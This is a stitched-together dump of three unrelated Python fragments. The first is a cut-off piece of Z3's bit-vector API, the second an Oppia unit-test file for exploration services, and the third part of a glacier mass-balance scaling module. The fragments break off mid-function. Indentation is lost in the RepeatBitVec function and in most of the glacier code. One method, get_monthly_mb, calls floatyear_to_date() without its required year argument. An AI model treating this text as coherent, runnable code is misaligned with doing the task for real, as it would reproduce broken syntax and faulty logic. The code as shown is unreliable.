    unsigned remainder.

    >>> x = BitVec('x', 32)
    >>> y = BitVec('y', 32)
    >>> SRem(x, y)
    SRem(x, y)
    >>> SRem(x, y).sort()
    BitVec(32)
    >>> (x % y).sexpr()
    '(bvsmod x y)'
    >>> SRem(x, y).sexpr()
    '(bvsrem x y)'
    """
    _check_bv_args(a, b)
    num, den = _coerce_exprs(a, b)
    ast = Z3_mk_bvsrem(num.ctx_ref(), num.as_ast(), den.as_ast())
    return BitVecRef(ast, num.ctx)
def LShR(a, b):
    """Create the Z3 expression logical right shift.

    The infix operator >> builds the *arithmetical* right shift instead.

    >>> x, y = BitVecs('x y', 32)
    >>> LShR(x, y)
    LShR(x, y)
    >>> (x >> y).sexpr()
    '(bvashr x y)'
    >>> LShR(x, y).sexpr()
    '(bvlshr x y)'
    >>> BitVecVal(4, 3)
    4
    >>> BitVecVal(4, 3).as_signed_long()
    -4
    >>> simplify(BitVecVal(4, 3) >> 1).as_signed_long()
    -2
    >>> simplify(BitVecVal(4, 3) >> 1)
    6
    >>> simplify(LShR(BitVecVal(4, 3), 1))
    2
    >>> simplify(BitVecVal(2, 3) >> 1)
    1
    >>> simplify(LShR(BitVecVal(2, 3), 1))
    1
    """
    _check_bv_args(a, b)
    val, amount = _coerce_exprs(a, b)
    ast = Z3_mk_bvlshr(val.ctx_ref(), val.as_ast(), amount.as_ast())
    return BitVecRef(ast, val.ctx)
def RotateLeft(a, b):
    """Return an expression representing `a` rotated to the left `b` times.

    >>> a, b = BitVecs('a b', 16)
    >>> RotateLeft(a, b)
    RotateLeft(a, b)
    >>> simplify(RotateLeft(a, 0))
    a
    >>> simplify(RotateLeft(a, 16))
    a
    """
    _check_bv_args(a, b)
    val, amount = _coerce_exprs(a, b)
    ast = Z3_mk_ext_rotate_left(val.ctx_ref(), val.as_ast(), amount.as_ast())
    return BitVecRef(ast, val.ctx)
def RotateRight(a, b):
    """Return an expression representing `a` rotated to the right `b` times.

    >>> a, b = BitVecs('a b', 16)
    >>> RotateRight(a, b)
    RotateRight(a, b)
    >>> simplify(RotateRight(a, 0))
    a
    >>> simplify(RotateRight(a, 16))
    a
    """
    _check_bv_args(a, b)
    val, amount = _coerce_exprs(a, b)
    ast = Z3_mk_ext_rotate_right(val.ctx_ref(), val.as_ast(), amount.as_ast())
    return BitVecRef(ast, val.ctx)
def SignExt(n, a):
    """Return a bit-vector expression with `n` extra sign-bits.

    >>> x = BitVec('x', 16)
    >>> n = SignExt(8, x)
    >>> n.size()
    24
    >>> n
    SignExt(8, x)
    >>> n.sort()
    BitVec(24)
    >>> v0 = BitVecVal(2, 2)
    >>> v0
    2
    >>> v0.size()
    2
    >>> v = simplify(SignExt(6, v0))
    >>> v
    254
    >>> v.size()
    8
    >>> print("%.x" % v.as_long())
    fe
    """
    if z3_debug():
        _z3_assert(_is_int(n), "First argument must be an integer")
        _z3_assert(is_bv(a), "Second argument must be a Z3 bit-vector expression")
    ctx = a.ctx
    return BitVecRef(Z3_mk_sign_ext(ctx.ref(), n, a.as_ast()), ctx)
def ZeroExt(n, a):
    """Return a bit-vector expression with `n` extra zero-bits.

    >>> x = BitVec('x', 16)
    >>> n = ZeroExt(8, x)
    >>> n.size()
    24
    >>> n
    ZeroExt(8, x)
    >>> n.sort()
    BitVec(24)
    >>> v0 = BitVecVal(2, 2)
    >>> v0
    2
    >>> v0.size()
    2
    >>> v = simplify(ZeroExt(6, v0))
    >>> v
    2
    >>> v.size()
    8
    """
    if z3_debug():
        _z3_assert(_is_int(n), "First argument must be an integer")
        _z3_assert(is_bv(a), "Second argument must be a Z3 bit-vector expression")
    ctx = a.ctx
    return BitVecRef(Z3_mk_zero_ext(ctx.ref(), n, a.as_ast()), ctx)
def RepeatBitVec(n, a):
"""Return an expression representing `n` copies of `a`.
>>> x = BitVec('x', 8)
>>> n = RepeatBitVec(4, x)
>>> n
RepeatBitVec(4, x)
>>> n.size()
32
>>> v0 = BitVecVal(10, 4)
>>> print("%.x" % v0.as_long())
a
>>> v = simplify(RepeatBitVec(4, v0))
>>> v.size()
16
>>> print("%.x" % v.as_long())
aaaa
"""
if z3_debug():
_z3_assert(_is_int(n), "First argument must be an integer")
_z3_assert(is_bv(a), "Second | |
<filename>core/domain/exp_services_test.py<gh_stars>1-10
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = '<NAME>'
import copy
import datetime
import os
import StringIO
import zipfile
from core.domain import config_services
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_jobs
from core.domain import exp_services
from core.domain import fs_domain
from core.domain import param_domain
from core.domain import rating_services
from core.domain import rights_manager
from core.domain import rule_domain
from core.domain import user_services
from core.platform import models
# Load the storage models and platform services used by the tests below.
(base_models, exp_models) = models.Registry.import_models([
    models.NAMES.base_model, models.NAMES.exploration
])
search_services = models.Registry.import_search_services()
taskqueue_services = models.Registry.import_taskqueue_services()
transaction_services = models.Registry.import_transaction_services()
from core.tests import test_utils
import feconf
import utils
# TODO(msl): test ExpSummaryModel changes if explorations are updated,
# reverted, deleted, created, rights changed
class ExplorationServicesUnitTests(test_utils.GenericTestBase):
    """Test the exploration services module."""

    # Default exploration id shared by the test suites below.
    EXP_ID = 'An_exploration_id'

    def setUp(self):
        """Before each individual test, create a dummy exploration."""
        super(ExplorationServicesUnitTests, self).setUp()
        # Resolve the ids of the canonical test users supplied by the base
        # class, and make sure matching user records exist before signup.
        self.OWNER_ID = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.EDITOR_ID = self.get_user_id_from_email(self.EDITOR_EMAIL)
        self.VIEWER_ID = self.get_user_id_from_email(self.VIEWER_EMAIL)

        user_services.get_or_create_user(self.OWNER_ID, self.OWNER_EMAIL)
        user_services.get_or_create_user(self.EDITOR_ID, self.EDITOR_EMAIL)
        user_services.get_or_create_user(self.VIEWER_ID, self.VIEWER_EMAIL)

        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
        self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)

        # Grant admin rights to the admin test user.
        self.set_admins([self.ADMIN_EMAIL])
        self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
class ExplorationQueriesUnitTests(ExplorationServicesUnitTests):
    """Tests query methods."""

    def test_count_explorations(self):
        """Test count_explorations()."""
        self.assertEqual(exp_services.count_explorations(), 0)

        self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)
        self.assertEqual(exp_services.count_explorations(), 1)

        self.save_new_default_exploration(
            'A_new_exploration_id', self.OWNER_ID)
        self.assertEqual(exp_services.count_explorations(), 2)

    def test_get_exploration_titles_and_categories(self):
        """Test that titles/categories are returned only for existing ids."""
        self.assertEqual(
            exp_services.get_exploration_titles_and_categories([]), {})

        self.save_new_default_exploration('A', self.OWNER_ID, 'TitleA')
        self.assertEqual(
            exp_services.get_exploration_titles_and_categories(['A']), {
                'A': {
                    'category': 'A category',
                    'title': 'TitleA'
                }
            })

        self.save_new_default_exploration('B', self.OWNER_ID, 'TitleB')
        # Asking only for 'A' must not pick up the newly-created 'B'.
        self.assertEqual(
            exp_services.get_exploration_titles_and_categories(['A']), {
                'A': {
                    'category': 'A category',
                    'title': 'TitleA'
                }
            })
        self.assertEqual(
            exp_services.get_exploration_titles_and_categories(['A', 'B']), {
                'A': {
                    'category': 'A category',
                    'title': 'TitleA',
                },
                'B': {
                    'category': 'A category',
                    'title': 'TitleB',
                },
            })
        # Non-existent ids ('C') are silently omitted from the result.
        self.assertEqual(
            exp_services.get_exploration_titles_and_categories(['A', 'C']), {
                'A': {
                    'category': 'A category',
                    'title': 'TitleA'
                }
            })
class ExplorationCreateAndDeleteUnitTests(ExplorationServicesUnitTests):
    """Test creation and deletion methods."""

    def test_retrieval_of_explorations(self):
        """Test the get_exploration_by_id() method."""
        with self.assertRaisesRegexp(Exception, 'Entity .* not found'):
            exp_services.get_exploration_by_id('fake_eid')

        exploration = self.save_new_default_exploration(
            self.EXP_ID, self.OWNER_ID)
        retrieved_exploration = exp_services.get_exploration_by_id(self.EXP_ID)
        self.assertEqual(exploration.id, retrieved_exploration.id)
        self.assertEqual(exploration.title, retrieved_exploration.title)

        with self.assertRaises(Exception):
            exp_services.get_exploration_by_id('fake_exploration')

    def test_retrieval_of_multiple_explorations(self):
        """Test get_multiple_explorations_by_id() in strict and non-strict mode."""
        exps = {}
        chars = 'abcde'
        exp_ids = ['%s%s' % (self.EXP_ID, c) for c in chars]
        for _id in exp_ids:
            exp = self.save_new_valid_exploration(_id, self.OWNER_ID)
            exps[_id] = exp

        result = exp_services.get_multiple_explorations_by_id(
            exp_ids)
        for _id in exp_ids:
            self.assertEqual(result.get(_id).title, exps.get(_id).title)

        # Test retrieval of non-existent ids.
        result = exp_services.get_multiple_explorations_by_id(
            exp_ids + ['doesnt_exist'], strict=False
        )
        for _id in exp_ids:
            self.assertEqual(result.get(_id).title, exps.get(_id).title)
        self.assertNotIn('doesnt_exist', result)

        # In strict mode (the default), a missing id raises.
        with self.assertRaises(Exception):
            exp_services.get_multiple_explorations_by_id(
                exp_ids + ['doesnt_exist'])

    def test_soft_deletion_of_explorations(self):
        """Test that soft deletion of explorations works correctly."""
        # TODO(sll): Add tests for deletion of states and version snapshots.
        self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)
        # The exploration shows up in queries.
        self.assertEqual(
            len(exp_services.get_at_least_editable_exploration_summaries(
                self.OWNER_ID)), 1)

        exp_services.delete_exploration(self.OWNER_ID, self.EXP_ID)
        with self.assertRaises(Exception):
            exp_services.get_exploration_by_id(self.EXP_ID)

        # The deleted exploration does not show up in any queries.
        self.assertEqual(
            exp_services.get_at_least_editable_exploration_summaries(
                self.OWNER_ID),
            {})

        # But the models still exist in the backend.
        self.assertIn(
            self.EXP_ID,
            [exp.id for exp in exp_models.ExplorationModel.get_all(
                include_deleted_entities=True)]
        )

        # The exploration summary is deleted however
        self.assertNotIn(
            self.EXP_ID,
            [exp.id for exp in exp_models.ExpSummaryModel.get_all(
                include_deleted_entities=True)]
        )

    def test_hard_deletion_of_explorations(self):
        """Test that hard deletion of explorations works correctly."""
        self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)
        # The exploration shows up in queries.
        self.assertEqual(
            len(exp_services.get_at_least_editable_exploration_summaries(
                self.OWNER_ID)), 1)

        exp_services.delete_exploration(
            self.OWNER_ID, self.EXP_ID, force_deletion=True)
        with self.assertRaises(Exception):
            exp_services.get_exploration_by_id(self.EXP_ID)

        # The deleted exploration does not show up in any queries.
        self.assertEqual(
            exp_services.get_at_least_editable_exploration_summaries(
                self.OWNER_ID),
            {})

        # The exploration model has been purged from the backend.
        self.assertNotIn(
            self.EXP_ID,
            [exp.id for exp in exp_models.ExplorationModel.get_all(
                include_deleted_entities=True)]
        )

    def test_summaries_of_hard_deleted_explorations(self):
        """Test that summaries of hard deleted explorations are
        correctly deleted."""
        self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)

        exp_services.delete_exploration(
            self.OWNER_ID, self.EXP_ID, force_deletion=True)
        with self.assertRaises(Exception):
            exp_services.get_exploration_by_id(self.EXP_ID)

        # The deleted exploration summary does not show up in any queries.
        self.assertEqual(
            exp_services.get_at_least_editable_exploration_summaries(
                self.OWNER_ID), {})

        # The exploration summary model has been purged from the backend.
        self.assertNotIn(
            self.EXP_ID,
            [exp.id for exp in exp_models.ExpSummaryModel.get_all(
                include_deleted_entities=True)]
        )

    def test_explorations_are_removed_from_index_when_deleted(self):
        """Tests that explorations are removed from the search index when
        deleted.
        """
        self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)

        # Replace the search-service delete call with a checker that records
        # the expected document ids and index name.
        def mock_delete_docs(doc_ids, index):
            self.assertEqual(index, exp_services.SEARCH_INDEX_EXPLORATIONS)
            self.assertEqual(doc_ids, [self.EXP_ID])

        delete_docs_swap = self.swap(
            search_services, 'delete_documents_from_index', mock_delete_docs)

        with delete_docs_swap:
            exp_services.delete_exploration(self.OWNER_ID, self.EXP_ID)

    def test_create_new_exploration_error_cases(self):
        """Saving an exploration with an invalid title must fail validation."""
        exploration = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, '', '')
        with self.assertRaisesRegexp(Exception, 'between 1 and 50 characters'):
            exp_services.save_new_exploration(self.OWNER_ID, exploration)

        exploration = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'title', '')
        with self.assertRaisesRegexp(Exception, 'between 1 and 50 characters'):
            exp_services.save_new_exploration(self.OWNER_ID, exploration)

    def test_save_and_retrieve_exploration(self):
        """A saved exploration round-trips through the storage layer."""
        exploration = self.save_new_valid_exploration(
            self.EXP_ID, self.OWNER_ID)
        exploration.param_specs = {
            'theParameter': param_domain.ParamSpec('UnicodeString')}
        exp_services._save_exploration(self.OWNER_ID, exploration, '', [])

        retrieved_exploration = exp_services.get_exploration_by_id(self.EXP_ID)
        self.assertEqual(retrieved_exploration.title, 'A title')
        self.assertEqual(retrieved_exploration.category, 'A category')
        self.assertEqual(len(retrieved_exploration.states), 1)
        self.assertEqual(len(retrieved_exploration.param_specs), 1)
        self.assertEqual(
            retrieved_exploration.param_specs.keys()[0], 'theParameter')

    def test_save_and_retrieve_exploration_summary(self):
        """Updating an exploration is reflected in its stored summary."""
        exploration = self.save_new_valid_exploration(
            self.EXP_ID, self.OWNER_ID)
        exploration.param_specs = {
            'theParameter': param_domain.ParamSpec('UnicodeString')}
        exp_services._save_exploration(self.OWNER_ID, exploration, '', [])

        # change title and category
        exp_services.update_exploration(
            self.OWNER_ID, self.EXP_ID, [{
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'A new title'
            }, {
                'cmd': 'edit_exploration_property',
                'property_name': 'category',
                'new_value': 'A new category'
            }],
            'Change title and category')

        retrieved_exp_summary = exp_services.get_exploration_summary_by_id(
            self.EXP_ID)

        self.assertEqual(retrieved_exp_summary.title, 'A new title')
        self.assertEqual(retrieved_exp_summary.category, 'A new category')
class LoadingAndDeletionOfDemosTest(ExplorationServicesUnitTests):
    """Tests loading, validating and deleting the bundled demo explorations."""

    def test_loading_and_validation_and_deletion_of_demo_explorations(self):
        """Test loading, validation and deletion of the demo explorations."""
        self.assertEqual(exp_services.count_explorations(), 0)

        self.assertGreaterEqual(
            len(feconf.DEMO_EXPLORATIONS), 1,
            msg='There must be at least one demo exploration.')

        # TODO(msl): test ExpSummaryModel changes if explorations are updated,
        # reverted, deleted, created, rights changed
        # TODO(bhenning): Fix backend functionality needed to properly migrate
        # these explorations. All demo explorations should be able to be
        # loaded, validated, and deleted.
        excluded_demo_explorations = ['World Cities']

        for ind in range(len(feconf.DEMO_EXPLORATIONS)):
            start_time = datetime.datetime.utcnow()

            exp_id = str(ind)
            # Skip explorations known to fail migration/validation.
            if feconf.DEMO_EXPLORATIONS[ind][1] in excluded_demo_explorations:
                continue
            exp_services.load_demo(exp_id)
            exploration = exp_services.get_exploration_by_id(exp_id)
            warnings = exploration.validate(strict=True)
            if warnings:
                raise Exception(warnings)

            # Log the wall-clock time taken to load and validate this demo.
            duration = datetime.datetime.utcnow() - start_time
            processing_time = duration.seconds + duration.microseconds / 1E6
            self.log_line(
                'Loaded and validated exploration %s (%.2f seconds)' % (
                    exploration.title.encode('utf-8'), processing_time))

        self.assertEqual(
            exp_services.count_explorations(),
            len(feconf.DEMO_EXPLORATIONS) - len(excluded_demo_explorations))

        for ind in range(len(feconf.DEMO_EXPLORATIONS)):
            exp_services.delete_demo(str(ind))
        self.assertEqual(exp_services.count_explorations(), 0)
class ZipFileExportUnitTests(ExplorationServicesUnitTests):
    """Test export methods for explorations represented as zip files."""

    # Expected YAML serialization of the default two-state exploration
    # created by the tests below.
    # NOTE(review): indentation inside these YAML literals was reconstructed
    # from standard exploration-export nesting — confirm against the stored
    # export format.
    SAMPLE_YAML_CONTENT = (
"""author_notes: ''
blurb: ''
default_skin: conversation_v1
init_state_name: %s
language_code: en
objective: The objective
param_changes: []
param_specs: {}
schema_version: %d
skin_customizations:
  panels_contents: {}
states:
  %s:
    content:
    - type: text
      value: ''
    interaction:
      answer_groups: []
      customization_args:
        placeholder:
          value: ''
        rows:
          value: 1
      default_outcome:
        dest: %s
        feedback: []
        param_changes: []
      fallbacks: []
      id: TextInput
    param_changes: []
  New state:
    content:
    - type: text
      value: ''
    interaction:
      answer_groups: []
      customization_args:
        placeholder:
          value: ''
        rows:
          value: 1
      default_outcome:
        dest: New state
        feedback: []
        param_changes: []
      fallbacks: []
      id: TextInput
    param_changes: []
states_schema_version: %d
tags: []
""" % (
    feconf.DEFAULT_INIT_STATE_NAME,
    exp_domain.Exploration.CURRENT_EXPLORATION_SCHEMA_VERSION,
    feconf.DEFAULT_INIT_STATE_NAME,
    feconf.DEFAULT_INIT_STATE_NAME,
    feconf.CURRENT_EXPLORATION_STATES_SCHEMA_VERSION))

    # Same exploration after 'New state' has been renamed to 'Renamed state'.
    UPDATED_YAML_CONTENT = (
"""author_notes: ''
blurb: ''
default_skin: conversation_v1
init_state_name: %s
language_code: en
objective: The objective
param_changes: []
param_specs: {}
schema_version: %d
skin_customizations:
  panels_contents: {}
states:
  %s:
    content:
    - type: text
      value: ''
    interaction:
      answer_groups: []
      customization_args:
        placeholder:
          value: ''
        rows:
          value: 1
      default_outcome:
        dest: %s
        feedback: []
        param_changes: []
      fallbacks: []
      id: TextInput
    param_changes: []
  Renamed state:
    content:
    - type: text
      value: ''
    interaction:
      answer_groups: []
      customization_args:
        placeholder:
          value: ''
        rows:
          value: 1
      default_outcome:
        dest: Renamed state
        feedback: []
        param_changes: []
      fallbacks: []
      id: TextInput
    param_changes: []
states_schema_version: %d
tags: []
""" % (
    feconf.DEFAULT_INIT_STATE_NAME,
    exp_domain.Exploration.CURRENT_EXPLORATION_SCHEMA_VERSION,
    feconf.DEFAULT_INIT_STATE_NAME,
    feconf.DEFAULT_INIT_STATE_NAME,
    feconf.CURRENT_EXPLORATION_STATES_SCHEMA_VERSION))

    def test_export_to_zip_file(self):
        """Test the export_to_zip_file() method."""
        exploration = self.save_new_valid_exploration(
            self.EXP_ID, self.OWNER_ID, objective='The objective')
        init_state = exploration.states[exploration.init_state_name]
        init_interaction = init_state.interaction
        init_interaction.default_outcome.dest = exploration.init_state_name
        exploration.add_states(['New state'])
        exploration.states['New state'].update_interaction_id('TextInput')
        exp_services._save_exploration(self.OWNER_ID, exploration, '', [])

        zip_file_output = exp_services.export_to_zip_file(self.EXP_ID)
        zf = zipfile.ZipFile(StringIO.StringIO(zip_file_output))

        self.assertEqual(zf.namelist(), ['A title.yaml'])
        self.assertEqual(
            zf.open('A title.yaml').read(), self.SAMPLE_YAML_CONTENT)

    def test_export_to_zip_file_with_assets(self):
        """Test exporting an exploration with assets to a zip file."""
        exploration = self.save_new_valid_exploration(
            self.EXP_ID, self.OWNER_ID, objective='The objective')
        init_state = exploration.states[exploration.init_state_name]
        init_interaction = init_state.interaction
        init_interaction.default_outcome.dest = exploration.init_state_name
        exploration.add_states(['New state'])
        exploration.states['New state'].update_interaction_id('TextInput')
        exp_services._save_exploration(self.OWNER_ID, exploration, '', [])

        # Attach an image asset to the exploration's file system.
        with open(os.path.join(feconf.TESTS_DATA_DIR, 'img.png')) as f:
            raw_image = f.read()
        fs = fs_domain.AbstractFileSystem(
            fs_domain.ExplorationFileSystem(self.EXP_ID))
        fs.commit(self.OWNER_ID, 'abc.png', raw_image)

        zip_file_output = exp_services.export_to_zip_file(self.EXP_ID)
        zf = zipfile.ZipFile(StringIO.StringIO(zip_file_output))

        self.assertEqual(zf.namelist(), ['A title.yaml', 'assets/abc.png'])
        self.assertEqual(
            zf.open('A title.yaml').read(), self.SAMPLE_YAML_CONTENT)
        self.assertEqual(zf.open('assets/abc.png').read(), raw_image)

    def test_export_by_versions(self):
        """Test export_to_zip_file() for different versions."""
        exploration = self.save_new_valid_exploration(
            self.EXP_ID, self.OWNER_ID, objective='The objective')
        self.assertEqual(exploration.version, 1)

        init_state = exploration.states[exploration.init_state_name]
        init_interaction = init_state.interaction
        init_interaction.default_outcome.dest = exploration.init_state_name
        exploration.add_states(['New state'])
        exploration.states['New state'].update_interaction_id('TextInput')
        with open(os.path.join(feconf.TESTS_DATA_DIR, 'img.png')) as f:
            raw_image = f.read()
        fs = fs_domain.AbstractFileSystem(
            fs_domain.ExplorationFileSystem(self.EXP_ID))
        fs.commit(self.OWNER_ID, 'abc.png', raw_image)
        exp_services._save_exploration(self.OWNER_ID, exploration, '', [])
        self.assertEqual(exploration.version, 2)

        exploration.rename_state('New state', 'Renamed state')
        exp_services._save_exploration(self.OWNER_ID, exploration, '', [])
        self.assertEqual(exploration.version, 3)

        # Download version 2
        zip_file_output = exp_services.export_to_zip_file(self.EXP_ID, 2)
        zf = zipfile.ZipFile(StringIO.StringIO(zip_file_output))
        self.assertEqual(
            zf.open('A title.yaml').read(), self.SAMPLE_YAML_CONTENT)

        # Download version 3
        zip_file_output = exp_services.export_to_zip_file(self.EXP_ID, 3)
        zf = zipfile.ZipFile(StringIO.StringIO(zip_file_output))
        self.assertEqual(
            zf.open('A title.yaml').read(), self.UPDATED_YAML_CONTENT)
class YAMLExportUnitTests(ExplorationServicesUnitTests):
"""Test export methods for explorations represented as a dict whose keys
are state names and whose values are YAML strings | |
time. Setting it to a fixed seed accross glaciers can
be usefull if you want to have the same climate years for all of them
temperature_bias : float, optional
add a bias to the temperature timeseries, default = None
climate_filename : str, optional
name of the climate file, e.g. 'climate_monthly' (default) or
'gcm_data'
climate_input_filesuffix: str, optional
filesuffix for the input climate file
output_filesuffix : str, optional
this add a suffix to the output file (useful to avoid overwriting
previous experiments)
init_area_m2: float, optional
glacier area with which the model is initialized, default is RGI value
unique_samples: bool, optional
if true, chosen random mass-balance years will only be available once
per random climate period-length
if false, every model year will be chosen from the random climate
period with the same probability (default)
Returns
-------
:py:class:`oggm.core.vascaling.VAScalingModel`
"""
# instance mass balance model
mb_mod = RandomVASMassBalance(gdir, y0=y0, halfsize=halfsize, bias=bias,
seed=seed, filename=climate_filename,
input_filesuffix=climate_input_filesuffix,
unique_samples=unique_samples)
if temperature_bias is not None:
# add given temperature bias to mass balance model
mb_mod.temp_bias = temperature_bias
# where to store the model output
diag_path = gdir.get_filepath('model_diagnostics', filesuffix='vas',
delete=True)
# instance the model
min_hgt, max_hgt = get_min_max_elevation(gdir)
if init_area_m2 is None:
init_area_m2 = gdir.rgi_area_m2
model = VAScalingModel(year_0=0, area_m2_0=init_area_m2,
min_hgt=min_hgt, max_hgt=max_hgt,
mb_model=mb_mod)
# specify path where to store model diagnostics
diag_path = gdir.get_filepath('model_diagnostics',
filesuffix=output_filesuffix,
delete=True)
# run model
model.run_until_and_store(year_end=nyears, diag_path=diag_path)
return model
class ConstantVASMassBalance(MassBalanceModel):
"""Constant mass-balance during a chosen period.
This is useful for equilibrium experiments.
"""
def __init__(self, gdir, mu_star=None, bias=None,
y0=None, halfsize=15, filename='climate_monthly',
input_filesuffix=''):
"""Initialize.
Parameters
----------
gdir : GlacierDirectory
the glacier directory
mu_star : float, optional
set to the alternative value of mu* you want to use
(the default is to use the calibrated value)
bias : float, optional
set to the alternative value of the calibration bias [mm we yr-1]
you want to use (the default is to use the calibrated value)
Note that this bias is *substracted* from the computed MB. Indeed:
BIAS = MODEL_MB - REFERENCE_MB.
y0 : int, optional, default: tstar
the year at the center of the period of interest. The default
is to use tstar as center.
halfsize : int, optional
the half-size of the time window (window size = 2 * halfsize + 1)
filename : str, optional
set to a different BASENAME if you want to use alternative climate
data.
input_filesuffix : str
the file suffix of the input climate file
"""
super(ConstantVASMassBalance, self).__init__()
# initialize the VAS equivalent of the PastMassBalance model over the
# whole available climate period
self.mbmod = VAScalingMassBalance(gdir, mu_star=mu_star, bias=bias,
filename=filename,
input_filesuffix=input_filesuffix)
# use t* as the center of the climatological period if not given
if y0 is None:
df = gdir.read_json('vascaling_mustar')
y0 = df['t_star']
# set model properties
self.prcp_clim = self.mbmod.prcp_clim
self.y0 = y0
self.halfsize = halfsize
self.years = np.arange(y0 - halfsize, y0 + halfsize + 1)
self.hemisphere = gdir.hemisphere
@property
def temp_bias(self):
"""Temperature bias to add to the original series."""
return self.mbmod.temp_bias
@temp_bias.setter
def temp_bias(self, value):
"""Temperature bias to add to the original series."""
for attr_name in ['_lazy_interp_yr', '_lazy_interp_m']:
if hasattr(self, attr_name):
delattr(self, attr_name)
self.mbmod.temp_bias = value
@property
def prcp_bias(self):
"""Precipitation factor to apply to the original series."""
return self.mbmod.prcp_bias
@prcp_bias.setter
def prcp_bias(self, value):
"""Precipitation factor to apply to the original series."""
for attr_name in ['_lazy_interp_yr', '_lazy_interp_m']:
if hasattr(self, attr_name):
delattr(self, attr_name)
self.mbmod.prcp_bias = value
@property
def bias(self):
"""Residual bias to apply to the original series."""
return self.mbmod.bias
@bias.setter
def bias(self, value):
"""Residual bias to apply to the original series."""
self.mbmod.bias = value
def get_climate(self, min_hgt, max_hgt, year=None):
"""Average mass balance climate information for given glacier.
Note that prcp is corrected with the precipitation factor and that
all other biases (precipitation, temp) are applied.
Returns
-------
[float, float]
(temp_for_melt) positive terminus temperature [degC] and
(prcp_solid) solid precipitation amount [kg/m^2]
"""
# create monthly timeseries over whole climate period
yrs = utils.monthly_timeseries(self.years[0], self.years[-1],
include_last_year=True)
# create empty containers
temp = list()
prcp = list()
# iterate over all months
for i, yr in enumerate(yrs):
# get positive melting temperature and solid precipitaion
t, p = self.mbmod.get_monthly_climate(min_hgt, max_hgt, year=yr)
temp.append(t)
prcp.append(p)
# Note that we do not weight for number of days per month - bad
return (np.mean(temp, axis=0),
np.mean(prcp, axis=0))
def get_monthly_mb(self, min_hgt, max_hgt, year=None):
""" Wrapper around the class intern mass balance model function.
Compute and return the glacier wide mass balance
for the given year/month combination.
Possible mb bias is applied...
Parameters
----------
min_hgt : float
glacier terminus elevation [m asl.]
max_hgt : float
maximal glacier (surface) elevation [m asl.]
year : float
floating year and month, following the hydrological year convention
Returns
-------
float
average glacier wide mass balance [m/s]
"""
# extract month from year
_, m = utils.floatyear_to_date()
# sum up the mass balance over all years in climate period
years = [utils.date_to_floatyear(yr, m) for yr in self.years]
mb = [self.mbmod.get_annual_mb(min_hgt, max_hgt, year=yr)
for yr in years]
# return average value
return np.average(mb)
def get_annual_mb(self, min_hgt, max_hgt, year=None):
""" Wrapper around the class intern mass balance model function.
Compute and return the annual glacier wide mass balance for the given
year. Possible mb bias is applied.
Parameters
----------
min_hgt : float
glacier terminus elevation
max_hgt : float
maximal glacier (surface) elevation
year : float
floating year, following the hydrological year convention
Returns
-------
float
average glacier wide mass balance [m/s]
"""
# sum up the mass balance over all years in climate period
mb = [self.mbmod.get_annual_mb(min_hgt, max_hgt, year=yr)
for yr in self.years]
# return average value
return np.average(mb)
def get_specific_mb(self, min_hgt, max_hgt, year=None):
    """Annual specific mass balance, averaged over the climate period.

    Wrapper around the class intern mass balance model: queries the
    specific mass balance of the underlying model for each year of the
    climate period and returns the average. A possible mb bias of the
    underlying model is applied. The ``year`` argument is accepted for
    interface compatibility but not used by the body.

    Parameters
    ----------
    min_hgt : float
        glacier terminus elevation
    max_hgt : float
        maximal glacier (surface) elevation
    year : float
        float year, using the hydrological year convention

    Returns
    -------
    float
        glacier wide average mass balance, units of millimeter water
        equivalent per year [mm w.e./yr]
    """
    # one specific-mb value per year of the climate period, averaged
    return np.average(
        [self.mbmod.get_specific_mb(min_hgt, max_hgt, year=y)
         for y in self.years])
def get_ela(self, year=None):
    """Return the ELA of the underlying mass balance model at ``self.y0``.

    The original docstring claimed this raises ``NotImplementedError``,
    which does not match the code: the call is delegated to the
    underlying model, always evaluated at the central year ``self.y0``
    of the climate period. The ``year`` argument is accepted for
    interface compatibility but ignored.

    Parameters
    ----------
    year : float, optional
        ignored; present for interface compatibility

    Returns
    -------
    the equilibrium line altitude as returned by the underlying
    mass balance model
    """
    # NOTE(review): `year` is not forwarded - the underlying model is
    # always queried at the central year self.y0; confirm this is the
    # intended behavior for a constant-climate wrapper
    return self.mbmod.get_ela(year=self.y0)
@entity_task(log)
def run_constant_climate(gdir, nyears=1000, y0=None, halfsize=15,
bias=None, temperature_bias=None,
climate_filename='climate_monthly',
climate_input_filesuffix='', output_filesuffix='',
init_area_m2=None):
"""
Runs the constant mass balance model for a given number of years.
This initializes a :py:class:`oggm.core.vascaling.ConstantVASMassBalance`,
and runs and stores a :py:class:`oggm.core.vascaling.VAScalingModel` with
the given mass balance model.
Parameters
----------
gdir : :py:class:`oggm.GlacierDirectory`
the glacier directory to process
nyears : int, optional
length of the simulation, default = 1000
y0 : int, optional
central year of the random climate period. The default is to be
centred on t*. Default = None
halfsize : int, optional
the half-size of the time window (window size = 2 * halfsize + 1),
default = 15
bias : float, optional
bias of the mb model. Default is to use the calibrated one, which
is often a better idea. For t* experiments it can be useful to set it
to zero. Default = None
temperature_bias : float, optional
add a bias to the temperature timeseries, default = None
climate_filename : str, optional
name of the climate file, e.g. 'climate_monthly' (default) or
'gcm_data'
climate_input_filesuffix: str, optional
filesuffix for the input climate file
output_filesuffix : str, optional
this add a suffix to the output file (useful to avoid overwriting
previous experiments)
init_area_m2: float, optional
glacier area with which the model is initialized, default is RGI value
Returns
-------
:py:class:`oggm.core.vascaling.VAScalingModel`
"""
